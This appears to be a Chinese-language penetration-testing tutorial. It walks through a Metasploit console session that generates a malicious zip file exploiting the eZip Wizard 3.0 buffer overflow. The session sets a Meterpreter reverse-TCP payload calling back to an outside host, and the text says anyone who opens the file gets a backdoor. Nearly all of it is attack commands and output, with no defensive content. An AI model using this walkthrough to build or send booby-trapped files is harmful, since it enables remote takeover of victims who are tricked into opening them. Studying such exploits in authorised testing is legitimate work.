web安全学习了解:web渗透测试
官网:宣紫科技
这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马
打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar
msf > search zip
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/oracle/post_exploitation/win32upload 2005-02-10 normal Oracle URL Download
auxiliary/dos/wifi/netgear_ma521_rates normal NetGear MA521 Wireless Driver Long Rates Overflow
auxiliary/dos/wifi/netgear_wg311pci normal NetGear WG311v1 Wireless Driver Long SSID Overflow
exploit/multi/fileformat/peazip_command_injection 2009-06-05 excellent PeaZip <= 2.6.1 Zip Processing Command Injection
exploit/multi/http/splunk_mappy_exec 2011-12-12 excellent Splunk Search Remote Code Execution
exploit/multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent Wyse Rapport Hagent Fake Hserver Command Execution
exploit/osx/browser/safari_metadata_archive 2006-02-21 excellent Safari Archive Metadata Command Execution
exploit/solaris/dtspcd/heap_noir 2002-07-10 great Solaris dtspcd Heap Overflow
exploit/windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal Adobe Shockwave rcsL Memory Corruption
exploit/windows/browser/ms06_067_keyframe 2006-11-14 normal Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
exploit/windows/browser/winzip_fileview 2007-11-02 normal WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
exploit/windows/driver/dlink_wifi_rates 2006-11-13 low D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
exploit/windows/fileformat/ezip_wizard_bof 2009-03-09 good eZip Wizard 3.0 Stack Buffer Overflow
exploit/windows/fileformat/real_networks_netzip_bof 2011-01-30 good Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
exploit/windows/fileformat/scadaphone_zip 2011-09-12 good ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow
exploit/windows/fileformat/tugzip 2008-10-28 good TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
exploit/windows/ftp/3cdaemon_ftp_user 2005-01-04 average 3Com 3CDaemon 2.0 FTP Username Overflow
exploit/windows/ftp/easyftp_cwd_fixret 2010-02-16 great EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
exploit/windows/http/hp_nnm_ovas 2008-04-02 good HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
exploit/windows/telnet/gamsoft_telsrv_username 2000-07-17 average GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/tftp/attftp_long_filename 2006-11-27 average Allied Telesyn TFTP Server 1.9 Long Filename Overflow
msf >
以ezip_winzard_bof为例: exploit/windows/fileformat/ezip_wizard_bof
msf > info exploit/windows/fileformat/ezip_wizard_bof
Name: eZip Wizard 3.0 Stack Buffer Overflow
Module: exploit/windows/fileformat/ezip_wizard_bof
Version: 15014
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Provided by:
fl0 fl0w
jduck <jduck@metasploit.com>
Lincoln
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.zip yes The output file name.
USERNAME yes Username
Payload information:
Description:
This module exploits a stack-based buffer overflow vulnerability in
version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command
to be executed, an attacker must convince someone to open a
specially crafted zip file with eZip Wizard, and access the
specially file via double-clicking it. By doing so, an attacker can
execute arbitrary code as the victim user.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1028
http://www.osvdb.org/52815
http://www.securityfocus.com/bid/34044
http://www.edisys.com/
http://www.exploit-db.com/exploits/8180
http://www.exploit-db.com/exploits/12059
msf >
eZip Wizard 3.0的本地溢出 我们来生成一下:
msf exploit(ezip_wizard_bof) > show options
Module options (exploit/windows/fileformat/ezip_wizard_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.zip yes The output file name.
USERNAME yes Username
Exploit target:
Id Name
-- ----
0 Windows Universal
msf exploit(ezip_wizard_bof) > set USERNAME
set USERNAME
msf exploit(ezip_wizard_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ezip_wizard_bof) > set USERNAME test
USERNAME => test
msf exploit(ezip_wizard_bof) > set LHOST 5.5.5.5
LHOST => 5.5.5.5
msf exploit(ezip_wizard_bof) > exploit
[*] Creating 'msf.zip' file...
[+] msf.zip stored at /root/.msf4/local/msf.zip
msf exploit(ezip_wizard_bof) >
查看一下生成的文件:
root@root:~# file /root/.msf4/local/msf.zip
/root/.msf4/local/msf.zip: Zip archive data, at least v2.0 to extract
root@root:~#
当别人用eZip Wizard 3.0打开以后 就会中我们的PAYLOAD 后门